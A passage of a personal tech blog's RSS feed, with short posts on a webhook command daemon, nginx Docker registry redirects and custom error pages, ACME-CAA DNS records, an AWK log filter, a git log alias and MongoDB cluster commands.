  1427.  "Port": 8059,
  1428.  "HookList": [
  1429.    {
  1430.      "Path": "/myhook",
  1431.      "Exec": [
  1432.        {
  1433.          "Cmd": "/usr/bin/somecmd",
  1434.          "Args": [
  1435.            "--some",
  1436.            "arguments"
  1437.          ],
  1438.          "Timeout": "5s"
  1439.        }
  1440.      ]
  1441.    }
  1442.  ]
  1443. }</pre>
  1444. <p>The commands are called with a timeout after which they are stopped to avoid that things hang around forever.</p>
  1445. ]]></description>
  1446.    <content:encoded><![CDATA[<p>To automate some of the deployment steps on my personal server, I needed a tool which can be triggered by a webhook and does execute some pre-defined commands.</p>
  1447. <p>A classic solution for this would be to have a simple PHP script with a call to <code>system(...)</code>. But I don't have PHP installed on the server itself and wanted this to be more lightweight than a full Apache+PHP installation.</p>
  1448. <p>Thus <a href="https://github.com/x-way/exec-hookd" title="x-way/exec-hookd: execute commands from webhooks">exec-hookd</a> was born. It is a small Go daemon which listens to HTTP POST requests and runs pre-defined commands when a matching path is requested.</p>
  1449. <p>Its configuration lives in a small JSON file, which lists the port to listen on and the paths together with their commands to execute:</p>
  1450. <pre>{
  1451.  "Port": 8059,
  1452.  "HookList": [
  1453.    {
  1454.      "Path": "/myhook",
  1455.      "Exec": [
  1456.        {
  1457.          "Cmd": "/usr/bin/somecmd",
  1458.          "Args": [
  1459.            "--some",
  1460.            "arguments"
  1461.          ],
  1462.          "Timeout": "5s"
  1463.        }
  1464.      ]
  1465.    }
  1466.  ]
  1467. }</pre>
  1468. <p>The commands are called with a timeout after which they are stopped to avoid that things hang around forever.</p>
  1469. ]]></content:encoded>
  1470.  </item>
  1471.  
  1472.  <item>
  1473.    <title>Nice git log alias</title>
  1474.    <link>https://blog.x-way.org/Coding/2023/04/16/Nice-git-log-alias.html</link>
  1475.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324314</guid>
  1476.    <dc:creator>Andreas Jaggi</dc:creator>
  1477.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1478.    <pubDate>Sun, 16 Apr 2023 13:55:00 +0000</pubDate>
  1479.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  1480.    <description><![CDATA[<p><a href="https://uninformation.org/" title="Wald- und Wiesen-Weblog - uninformation.org">Ralf</a> <a href="https://web.archive.org/web/20231128231558/https://masto.futbol/@oldschooldev/109839690235274960" title="ralf g.: killer-alias für das schönste gitlog in der shell">tooted</a> a nice and tidy git log output alias for the console:</p>
  1481. <code>
  1482. alias glg="git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)&lt;%an&gt;%Creset' --abbrev-commit"
  1483. </code>
  1484. ]]></description>
  1485.    <content:encoded><![CDATA[<p><a href="https://uninformation.org/" title="Wald- und Wiesen-Weblog - uninformation.org">Ralf</a> <a href="https://web.archive.org/web/20231128231558/https://masto.futbol/@oldschooldev/109839690235274960" title="ralf g.: killer-alias für das schönste gitlog in der shell">tooted</a> a nice and tidy git log output alias for the console:</p>
  1486. <code>
  1487. alias glg="git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)&lt;%an&gt;%Creset' --abbrev-commit"
  1488. </code>
  1489. ]]></content:encoded>
  1490.  </item>
  1491.  
  1492.  <item>
  1493.    <title>Docker registry facade with nginx</title>
  1494.    <link>https://blog.x-way.org/Linux/2023/03/18/Docker-registry-facade-with-nginx.html</link>
  1495.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324313</guid>
  1496.    <dc:creator>Andreas Jaggi</dc:creator>
  1497.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1498.    <pubDate>Sat, 18 Mar 2023 10:36:00 +0000</pubDate>
  1499.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  1500.    <description><![CDATA[<p>Found <a href="https://httptoolkit.com/blog/docker-image-registry-facade/" title="Dodge the next Dockerpocalypse: how to own your own Docker Registry address">this inspiring blog post</a> about how to use your own domain for Docker images. (via <a href="https://news.ycombinator.com/item?id=35205838" title="How to own your own Docker Registry address | Hacker News">HN</a>)</p>
  1501. <p>It explains how to use your own domain with redirects such that the Docker registry hosting the images can be changed easily. Your domain is only used for issueing HTTP redirects, so that the actual data storage and transfer happens directly with the Docker registry.</p>
  1502. <p>The blog post comes with <a href="https://github.com/httptoolkit/docker-registry-facade/blob/main/Caddyfile" title="Caddyfile">a sample implementation for Caddy</a>. As my server is running <a href="https://nginx.org/" title="nginx">nginx</a>, I used the following config snippet to achieve the same result:</p>
  1503. <pre>
  1504. server {
  1505. listen 443 ssl;
  1506. listen [::]:443 ssl;
  1507.  
  1508. server_name docker.x-way.org;
  1509.  
  1510. access_log /var/log/nginx/docker.x-way.org.access.log;
  1511. error_log /var/log/nginx/docker.x-way.org.error.log;
  1512.  
  1513. ssl_certificate /etc/letsencrypt/live/docker.x-way.org/fullchain.pem;
  1514. ssl_certificate_key /etc/letsencrypt/live/docker.x-way.org/privkey.pem;
  1515.  
  1516. location / {
  1517. return 403;
  1518. }
  1519.  
  1520. location = /v2 {
  1521. add_header Cache-Control 'max-age=300, must-revalidate';
  1522. return 307 https://registry.hub.docker.com$request_uri;
  1523. }
  1524. location = /v2/ {
  1525. add_header Cache-Control 'max-age=300, must-revalidate';
  1526. return 307 https://registry.hub.docker.com$request_uri;
  1527. }
  1528. location = /v2/xway {
  1529. add_header Cache-Control 'max-age=300, must-revalidate';
  1530. return 307 https://registry.hub.docker.com$request_uri;
  1531. }
  1532. location /v2/xway/ {
  1533. add_header Cache-Control 'max-age=300, must-revalidate';
  1534. return 307 https://registry.hub.docker.com$request_uri;
  1535. }
  1536. }
  1537. </pre>
  1538. <p>Quickly tested it with some docker pull commands and already integrated it into the <a href="https://github.com/x-way/dnsupd/pull/72" title="Use custom registry by x-way - Pull Request #72 - x-way/dnsupd">build process of dnsupd</a>.</p>
  1539. ]]></description>
  1540.    <content:encoded><![CDATA[<p>Found <a href="https://httptoolkit.com/blog/docker-image-registry-facade/" title="Dodge the next Dockerpocalypse: how to own your own Docker Registry address">this inspiring blog post</a> about how to use your own domain for Docker images. (via <a href="https://news.ycombinator.com/item?id=35205838" title="How to own your own Docker Registry address | Hacker News">HN</a>)</p>
  1541. <p>It explains how to use your own domain with redirects such that the Docker registry hosting the images can be changed easily. Your domain is only used for issueing HTTP redirects, so that the actual data storage and transfer happens directly with the Docker registry.</p>
  1542. <p>The blog post comes with <a href="https://github.com/httptoolkit/docker-registry-facade/blob/main/Caddyfile" title="Caddyfile">a sample implementation for Caddy</a>. As my server is running <a href="https://nginx.org/" title="nginx">nginx</a>, I used the following config snippet to achieve the same result:</p>
  1543. <pre>
  1544. server {
  1545. listen 443 ssl;
  1546. listen [::]:443 ssl;
  1547.  
  1548. server_name docker.x-way.org;
  1549.  
  1550. access_log /var/log/nginx/docker.x-way.org.access.log;
  1551. error_log /var/log/nginx/docker.x-way.org.error.log;
  1552.  
  1553. ssl_certificate /etc/letsencrypt/live/docker.x-way.org/fullchain.pem;
  1554. ssl_certificate_key /etc/letsencrypt/live/docker.x-way.org/privkey.pem;
  1555.  
  1556. location / {
  1557. return 403;
  1558. }
  1559.  
  1560. location = /v2 {
  1561. add_header Cache-Control 'max-age=300, must-revalidate';
  1562. return 307 https://registry.hub.docker.com$request_uri;
  1563. }
  1564. location = /v2/ {
  1565. add_header Cache-Control 'max-age=300, must-revalidate';
  1566. return 307 https://registry.hub.docker.com$request_uri;
  1567. }
  1568. location = /v2/xway {
  1569. add_header Cache-Control 'max-age=300, must-revalidate';
  1570. return 307 https://registry.hub.docker.com$request_uri;
  1571. }
  1572. location /v2/xway/ {
  1573. add_header Cache-Control 'max-age=300, must-revalidate';
  1574. return 307 https://registry.hub.docker.com$request_uri;
  1575. }
  1576. }
  1577. </pre>
  1578. <p>Quickly tested it with some docker pull commands and already integrated it into the <a href="https://github.com/x-way/dnsupd/pull/72" title="Use custom registry by x-way - Pull Request #72 - x-way/dnsupd">build process of dnsupd</a>.</p>
  1579. ]]></content:encoded>
  1580.  </item>
  1581.  
  1582.  <item>
  1583.    <title>STRAYA 🇦🇺</title>
  1584.    <link>https://blog.x-way.org/Music/2023/01/26/STRAYA.html</link>
  1585.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324312</guid>
  1586.    <dc:creator>Andreas Jaggi</dc:creator>
  1587.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1588.    <pubDate>Thu, 26 Jan 2023 05:43:00 +0000</pubDate>
  1589.    <category domain="https://blog.x-way.org/Music">Music</category>
  1590.    <description><![CDATA[<p>Here's a bit older mashup. Happy <a href="https://www.australiaday.com.au/" title="Australia Day 2023 - Australia Day in NSW">Australia Day</a>!</p>
  1591. <p><a href="https://youtu.be/rMdbVHPmCW0" title="National Anthem of STRAYA - YouTube">National Anthem of STRAYA</a></p>
  1592. ]]></description>
  1593.    <content:encoded><![CDATA[<p>Here's a bit older mashup. Happy <a href="https://www.australiaday.com.au/" title="Australia Day 2023 - Australia Day in NSW">Australia Day</a>!</p>
  1594. <p><a href="https://youtu.be/rMdbVHPmCW0" title="National Anthem of STRAYA - YouTube">National Anthem of STRAYA</a></p>
  1595. ]]></content:encoded>
  1596.  </item>
  1597.  
  1598.  <item>
  1599.    <title>ACME-CAA</title>
  1600.    <link>https://blog.x-way.org/Networking/2023/01/18/ACME-CAA.html</link>
  1601.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324311</guid>
  1602.    <dc:creator>Andreas Jaggi</dc:creator>
  1603.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1604.    <pubDate>Wed, 18 Jan 2023 23:06:00 +0000</pubDate>
  1605.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  1606.    <description><![CDATA[<p>Let's Encrypt recently <a href="https://community.letsencrypt.org/t/enabling-acme-caa-account-and-method-binding/189588" title="Enabling ACME CAA Account and Method Binding">introduced support</a> for <a href="https://www.rfc-editor.org/rfc/rfc8657" title="RFC8657">ACME-CAA</a>.</p>
  1607. <p>I've now extended my existing CAA DNS entries with the ACME-CAA properties:</p>
  1608. <pre>% dig +short -t CAA x-way.org
  1609. 0 issue "letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/68891730; validationmethods=http-01"
  1610. 0 issue "letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/605777876; validationmethods=http-01"</pre>
  1611. <p>The effect of this is that Let's Encrypt will only grant a signed TLS certificate if the request comes from one of my two accounts (authenticated with the corresponding private key).<br>If the certificate request comes from a different account, no TLS certificate will be granted.<br>This protects against man-in-the-middle attacks, specifically against attacks where someone between Let's Encrypt and my server would be trying to impersonate my server to obtain a signed TLS certificate.</p>
  1612. <p>Addendum:<br>In case you're wondering where to get the accounturi value from, it can be found in your account file:</p>
  1613. <pre>% cat /etc/letsencrypt/accounts/acme-v02.api.letsencrypt.org/directory/*/regr.json
  1614. {"body": {}, "uri": "https://acme-v02.api.letsencrypt.org/acme/acct/605777876"}</pre>
  1615. ]]></description>
  1616.    <content:encoded><![CDATA[<p>Let's Encrypt recently <a href="https://community.letsencrypt.org/t/enabling-acme-caa-account-and-method-binding/189588" title="Enabling ACME CAA Account and Method Binding">introduced support</a> for <a href="https://www.rfc-editor.org/rfc/rfc8657" title="RFC8657">ACME-CAA</a>.</p>
  1617. <p>I've now extended my existing CAA DNS entries with the ACME-CAA properties:</p>
  1618. <pre>% dig +short -t CAA x-way.org
  1619. 0 issue "letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/68891730; validationmethods=http-01"
  1620. 0 issue "letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/605777876; validationmethods=http-01"</pre>
  1621. <p>The effect of this is that Let's Encrypt will only grant a signed TLS certificate if the request comes from one of my two accounts (authenticated with the corresponding private key).<br>If the certificate request comes from a different account, no TLS certificate will be granted.<br>This protects against man-in-the-middle attacks, specifically against attacks where someone between Let's Encrypt and my server would be trying to impersonate my server to obtain a signed TLS certificate.</p>
  1622. <p>Addendum:<br>In case you're wondering where to get the accounturi value from, it can be found in your account file:</p>
  1623. <pre>% cat /etc/letsencrypt/accounts/acme-v02.api.letsencrypt.org/directory/*/regr.json
  1624. {"body": {}, "uri": "https://acme-v02.api.letsencrypt.org/acme/acct/605777876"}</pre>
  1625. ]]></content:encoded>
  1626.  </item>
  1627.  
  1628.  <item>
  1629.    <title>JSON Feed</title>
  1630.    <link>https://blog.x-way.org/Webdesign/2023/01/10/JSON-Feed.html</link>
  1631.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324310</guid>
  1632.    <dc:creator>Andreas Jaggi</dc:creator>
  1633.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1634.    <pubDate>Tue, 10 Jan 2023 21:51:00 +0000</pubDate>
  1635.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1636.    <description><![CDATA[<p>Added a <a href="https://en.wikipedia.org/wiki/JSON_Feed" title="JSON Feed - Wikipedia">JSON Feed</a> to this blog (in additon to the existing <a href="https://blog.x-way.org/rss.xml" title="x-log - RSS feed">RSS</a> and <a href="https://blog.x-way.org/atom.xml" title="x-log - Atom feed">Atom</a> feeds): <a href="https://blog.x-way.org/feed.json" title="x-log - JSON feed">https://blog.x-way.org/feed.json</a></p>
  1637. <p>To build the proper JSON file, I used <a href="https://github.com/vallieres/jekyll-json-feed/tree/master" title="JSON Feed for Jekyll">this Jekyll template</a> and the <a href="https://validator.jsonfeed.org/" title="JSON Feed Validator">JSON Feed validator</a>.</p>
  1638. ]]></description>
  1639.    <content:encoded><![CDATA[<p>Added a <a href="https://en.wikipedia.org/wiki/JSON_Feed" title="JSON Feed - Wikipedia">JSON Feed</a> to this blog (in additon to the existing <a href="https://blog.x-way.org/rss.xml" title="x-log - RSS feed">RSS</a> and <a href="https://blog.x-way.org/atom.xml" title="x-log - Atom feed">Atom</a> feeds): <a href="https://blog.x-way.org/feed.json" title="x-log - JSON feed">https://blog.x-way.org/feed.json</a></p>
  1640. <p>To build the proper JSON file, I used <a href="https://github.com/vallieres/jekyll-json-feed/tree/master" title="JSON Feed for Jekyll">this Jekyll template</a> and the <a href="https://validator.jsonfeed.org/" title="JSON Feed Validator">JSON Feed validator</a>.</p>
  1641. ]]></content:encoded>
  1642.  </item>
  1643.  
  1644.  <item>
  1645.    <title>Get last 24h of logs with AWK</title>
  1646.    <link>https://blog.x-way.org/Linux/2023/01/03/Get-last-24h-of-logs-with-AWK.html</link>
  1647.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324309</guid>
  1648.    <dc:creator>Andreas Jaggi</dc:creator>
  1649.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1650.    <pubDate>Tue, 03 Jan 2023 14:40:00 +0000</pubDate>
  1651.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  1652.    <description><![CDATA[<p>For a temporary log analysis task, I wanted to get the last 24h of logs from a <a href="http://www.postfix.org/" title="The Postfix Home Page">Postfix</a> logfile.<br>To achieve this I came up with the following AWK oneliner (which fails in spectacular ways around new years):</p>
  1653. <code>
  1654. awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()'
  1655. </code>
  1656. <p>This is then used in a cronjob to get a <a href="http://jimsun.linxnet.com/postfix_contrib.html" title="JIMSUN - Postfix Contribs">pflogsumm</a> summary of the last 24h:</p>
  1657. <code>
  1658. cat /var/log/mail.log | awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()' | pflogsumm
  1659. </code>
  1660. ]]></description>
  1661.    <content:encoded><![CDATA[<p>For a temporary log analysis task, I wanted to get the last 24h of logs from a <a href="http://www.postfix.org/" title="The Postfix Home Page">Postfix</a> logfile.<br>To achieve this I came up with the following AWK oneliner (which fails in spectacular ways around new years):</p>
  1662. <code>
  1663. awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()'
  1664. </code>
  1665. <p>This is then used in a cronjob to get a <a href="http://jimsun.linxnet.com/postfix_contrib.html" title="JIMSUN - Postfix Contribs">pflogsumm</a> summary of the last 24h:</p>
  1666. <code>
  1667. cat /var/log/mail.log | awk -F '[ :]+' 'BEGIN{m=split("Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec",d,"|"); for(o=1;o&lt;=m;o++){months[d[o]]=sprintf("%02d",o)}} mktime(strftime("%Y")" "months[$1]" "sprintf("%02d",$2+1)" "$3" "$4" "$5) &gt; systime()' | pflogsumm
  1668. </code>
  1669. ]]></content:encoded>
  1670.  </item>
  1671.  
  1672.  <item>
  1673.    <title>Happy New Year 2023</title>
  1674.    <link>https://blog.x-way.org/Misc/2022/12/31/Happy-New-Year-2023.html</link>
  1675.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324308</guid>
  1676.    <dc:creator>Andreas Jaggi</dc:creator>
  1677.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1678.    <pubDate>Sat, 31 Dec 2022 13:59:00 +0000</pubDate>
  1679.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1680.    <description><![CDATA[<p><a href="https://youtu.be/ZKGgsQg17cw" title="Sydney New Year's Eve midgnight fireworks - YouTube">Sydney New Year's Eve midgnight fireworks</a></p>
  1681. <p>As usual, Sydney is a bit ahead of us. Great memories, long time ago :-)</p>
  1682. ]]></description>
  1683.    <content:encoded><![CDATA[<p><a href="https://youtu.be/ZKGgsQg17cw" title="Sydney New Year's Eve midgnight fireworks - YouTube">Sydney New Year's Eve midgnight fireworks</a></p>
  1684. <p>As usual, Sydney is a bit ahead of us. Great memories, long time ago :-)</p>
  1685. ]]></content:encoded>
  1686.  </item>
  1687.  
  1688.  <item>
  1689.    <title>Alpha Bravo Charlie</title>
  1690.    <link>https://blog.x-way.org/Misc/2022/12/25/Alpha-Bravo-Charlie.html</link>
  1691.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324307</guid>
  1692.    <dc:creator>Andreas Jaggi</dc:creator>
  1693.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1694.    <pubDate>Sun, 25 Dec 2022 22:11:00 +0000</pubDate>
  1695.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  1696.    <description><![CDATA[<p>While closing an old account I had to communicate using the infamous NATO/ICAO phonetic alphabet (US banks like to exchange the 20+ character long <a href="https://en.wikipedia.org/wiki/International_Bank_Account_Number" title="International Bank Account Number - Wikipedia">IBANs</a> via poor-quality call-center phonelines).</p>
  1697. <p>As it has been a while since I last used it, I created a handy table to quickly lookup the code words: <a href="http://nato.sigint.ch" title="NATO/ICAO phonetic alphabet">nato.sigint.ch</a></p>
  1698. <p>Special feature: when queried by curl (eg. without a text/html Accept header) it returns the table as plaintext :-)</p>
  1699. <pre># curl nato.sigint.ch
  1700. A Alpha      S Sierra
  1701. B Bravo      T Tango
  1702. C Charlie    U Uniform
  1703. D Delta      V Victor
  1704. E Echo       W Whiskey
  1705. F Foxtrot    X X-ray
  1706. G Golf       Y Yankee
  1707. H Hotel      Z Zulu
  1708. I India      0 Zero
  1709. J Juliett    1 One
  1710. K Kilo       2 Two
  1711. L Lima       3 Three
  1712. M Mike       4 Four
  1713. N November   5 Five
  1714. O Oscar      6 Six
  1715. P Papa       7 Seven
  1716. Q Quebec     8 Eight
  1717. R Romeo      9 Niner</pre>
  1718. ]]></description>
  1719.    <content:encoded><![CDATA[<p>While closing an old account I had to communicate using the infamous NATO/ICAO phonetic alphabet (US banks like to exchange the 20+ character long <a href="https://en.wikipedia.org/wiki/International_Bank_Account_Number" title="International Bank Account Number - Wikipedia">IBANs</a> via poor-quality call-center phonelines).</p>
  1720. <p>As it has been a while since I last used it, I created a handy table to quickly lookup the code words: <a href="http://nato.sigint.ch" title="NATO/ICAO phonetic alphabet">nato.sigint.ch</a></p>
  1721. <p>Special feature: when queried by curl (eg. without a text/html Accept header) it returns the table as plaintext :-)</p>
  1722. <pre># curl nato.sigint.ch
  1723. A Alpha      S Sierra
  1724. B Bravo      T Tango
  1725. C Charlie    U Uniform
  1726. D Delta      V Victor
  1727. E Echo       W Whiskey
  1728. F Foxtrot    X X-ray
  1729. G Golf       Y Yankee
  1730. H Hotel      Z Zulu
  1731. I India      0 Zero
  1732. J Juliett    1 One
  1733. K Kilo       2 Two
  1734. L Lima       3 Three
  1735. M Mike       4 Four
  1736. N November   5 Five
  1737. O Oscar      6 Six
  1738. P Papa       7 Seven
  1739. Q Quebec     8 Eight
  1740. R Romeo      9 Niner</pre>
  1741. ]]></content:encoded>
  1742.  </item>
  1743.  
  1744.  <item>
  1745.    <title>How to Exit Vim</title>
  1746.    <link>https://blog.x-way.org/Linux/2022/08/07/How-to-Exit-Vim.html</link>
  1747.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324306</guid>
  1748.    <dc:creator>Andreas Jaggi</dc:creator>
  1749.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1750.    <pubDate>Sun, 07 Aug 2022 22:19:00 +0000</pubDate>
  1751.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  1752.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/how-to-exit-vim.jpg" alt="How to Exit Vim" height="459" width="680"></p>
  1753. <p>(<a href="https://twitter.com/sheeshee/status/1556000047539654657" title="Su-Shee (@sheeshee) / Twitter">via</a>)</p>
  1754. ]]></description>
  1755.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/how-to-exit-vim.jpg" alt="How to Exit Vim" height="459" width="680"></p>
  1756. <p>(<a href="https://twitter.com/sheeshee/status/1556000047539654657" title="Su-Shee (@sheeshee) / Twitter">via</a>)</p>
  1757. ]]></content:encoded>
  1758.  </item>
  1759.  
  1760.  <item>
  1761.    <title>Add node to MongoDB cluster</title>
  1762.    <link>https://blog.x-way.org/Linux/2022/07/06/Add-node-to-MongoDB-cluster.html</link>
  1763.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324305</guid>
  1764.    <dc:creator>Andreas Jaggi</dc:creator>
  1765.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1766.    <pubDate>Wed, 06 Jul 2022 22:14:00 +0000</pubDate>
  1767.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  1768.    <description><![CDATA[<p>To add a new node to an existing <a href="https://www.mongodb.com/" title="MongoDB">MongoDB</a> cluster, login to the mongo shell on the primary node and run the following command:</p>
  1769. <pre>rs.add({host:"mongodb3.example.net:27017"})</pre>
  1770. <p>Similar to remove a node from the cluster, use:</p>
  1771. <pre>rs.remove("mongodb3.example.net:27017")</pre>
  1772. ]]></description>
  1773.    <content:encoded><![CDATA[<p>To add a new node to an existing <a href="https://www.mongodb.com/" title="MongoDB">MongoDB</a> cluster, login to the mongo shell on the primary node and run the following command:</p>
  1774. <pre>rs.add({host:"mongodb3.example.net:27017"})</pre>
  1775. <p>Similar to remove a node from the cluster, use:</p>
  1776. <pre>rs.remove("mongodb3.example.net:27017")</pre>
  1777. ]]></content:encoded>
  1778.  </item>
  1779.  
  1780.  <item>
  1781.    <title>Custom nginx error pages</title>
  1782.    <link>https://blog.x-way.org/Webdesign/2022/06/19/Custom-nginx-error-pages.html</link>
  1783.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324304</guid>
  1784.    <dc:creator>Andreas Jaggi</dc:creator>
  1785.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  1786.    <pubDate>Sun, 19 Jun 2022 09:48:00 +0000</pubDate>
  1787.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  1788.    <description><![CDATA[<p>For quite some time I've been using custom nginx error pages on this site.<br>
  1789. My approach so far was to generate a bunch of static HTML with the various error messages and then configure them for each corresponding HTTP status codes in nginx.<br>As there are quite a number of HTTP errors, I used a little shell script to generate the whole config and HTML, in the end I had a huge file with snippets like the one below.</p>
  1790. <pre>
  1791. error_page 429 @custom_error_429;
  1792. location @custom_error_429 {
  1793. internal;
  1794. more_set_headers 'Content-Type: text/html';
  1795. echo '&lt;html&gt;...&lt;/html&gt;';
  1796. }
  1797. </pre>
  1798.  
  1799. <p>Now while implementing custom error pages for a different project, I tried to see if there is an easier way to do this.<br>
  1800. Some searching lead to the <a href="https://blog.adriaan.io/one-nginx-error-page-to-rule-them-all.html" title="One NGINX error page to rule them all - Adriaan's blog">One NGINX error page to rule them all</a> article which describes an alternative approach leveraging the nginx <abbr title="Server Side Includes">SSI</abbr> module to generate the error pages on the fly.</p>
  1801. <p>
  1802. Instead of generating and defining a specific error page for each error, a single error page is used for all errors.
  1803. </p>
  1804. <pre>
  1805. error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414
  1806.           415 416 417 418 421 422 423 424 425 426 428 429 431 451 500
  1807.           501 502 503 504 505 506 507 508 510 511 /error.html;
  1808.  
  1809. location = /error.html {
  1810. ssi on;
  1811. internal;
  1812. root /var/www/default;
  1813. }
  1814. </pre>
  1815. <p>nginx provides the status code as variable to our error page, but we also need the error message to make it more userfriendly.<br>
  1816. For this we define a mapping of status codes to the error messages.</p>
  1817. <pre>
  1818. map $status $status_text {
  1819.  400 'Bad Request';
  1820.  401 'Unauthorized';
  1821.  402 'Payment Required';
  1822.  403 'Forbidden';
  1823.  404 'Not Found';
  1824.  405 'Method Not Allowed';
  1825.  406 'Not Acceptable';
  1826.  407 'Proxy Authentication Required';
  1827.  408 'Request Timeout';
  1828.  409 'Conflict';
  1829.  410 'Gone';
  1830.  411 'Length Required';
  1831.  412 'Precondition Failed';
  1832.  413 'Payload Too Large';
  1833.  414 'URI Too Long';
  1834.  415 'Unsupported Media Type';
  1835.  416 'Range Not Satisfiable';
  1836.  417 'Expectation Failed';
  1837.  418 'I\'m a teapot';
  1838.  421 'Misdirected Request';
  1839.  422 'Unprocessable Entity';
  1840.  423 'Locked';
  1841.  424 'Failed Dependency';
  1842.  425 'Too Early';
  1843.  426 'Upgrade Required';
  1844.  428 'Precondition Required';
  1845.  429 'Too Many Requests';
  1846.  431 'Request Header Fields Too Large';
  1847.  451 'Unavailable For Legal Reasons';
  1848.  500 'Internal Server Error';
  1849.  501 'Not Implemented';
  1850.  502 'Bad Gateway';
  1851.  503 'Service Unavailable';
  1852.  504 'Gateway Timeout';
  1853.  505 'HTTP Version Not Supported';
  1854.  506 'Variant Also Negotiates';
  1855.  507 'Insufficient Storage';
  1856.  508 'Loop Detected';
  1857.  510 'Not Extended';
  1858.  511 'Network Authentication Required';
  1859.  default 'Something went wrong';
  1860. }
  1861. </pre>
  1862.  
  1863. <p>Now we have the <var>status</var> and the <var>status_text</var> variables available in our error.html page.</p>
  1864. <pre>
  1865. &lt;html&gt;&lt;body&gt;
  1866. &lt;h1&gt;&lt;!--# echo var="status" default="" --&gt;
  1867. &lt;!--# echo var="status_text" default="Something went wrong" --&gt;&lt;/h1&gt;
  1868. &lt;/body&gt;&lt;/html&gt;
  1869. </pre>
  1870. ]]></description>
  1871.    <content:encoded><![CDATA[<p>For quite some time I've been using custom nginx error pages on this site.<br>
  1872. My approach so far was to generate a bunch of static HTML with the various error messages and then configure them for each corresponding HTTP status codes in nginx.<br>As there are quite a number of HTTP errors, I used a little shell script to generate the whole config and HTML, in the end I had a huge file with snippets like the one below.</p>
  1873. <pre>
  1874. error_page 429 @custom_error_429;
  1875. location @custom_error_429 {
  1876. internal;
  1877. more_set_headers 'Content-Type: text/html';
  1878. echo '&lt;html&gt;...&lt;/html&gt;';
  1879. }
  1880. </pre>
  1881.  
  1882. <p>Now while implementing custom error pages for a different project, I tried to see if there is an easier way to do this.<br>
  1883. Some searching lead to the <a href="https://blog.adriaan.io/one-nginx-error-page-to-rule-them-all.html" title="One NGINX error page to rule them all - Adriaan's blog">One NGINX error page to rule them all</a> article which describes an alternative approach leveraging the nginx <abbr title="Server Side Includes">SSI</abbr> module to generate the error pages on the fly.</p>
  1884. <p>
  1885. Instead of generating and defining a specific error page for each error, a single error page is used for all errors.
  1886. </p>
  1887. <pre>
  1888. error_page 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414
  1889.           415 416 417 418 421 422 423 424 425 426 428 429 431 451 500
  1890.           501 502 503 504 505 506 507 508 510 511 /error.html;
  1891.  
  1892. location = /error.html {
  1893. ssi on;
  1894. internal;
  1895. root /var/www/default;
  1896. }
  1897. </pre>
  1898. <p>nginx provides the status code as variable to our error page, but we also need the error message to make it more userfriendly.<br>
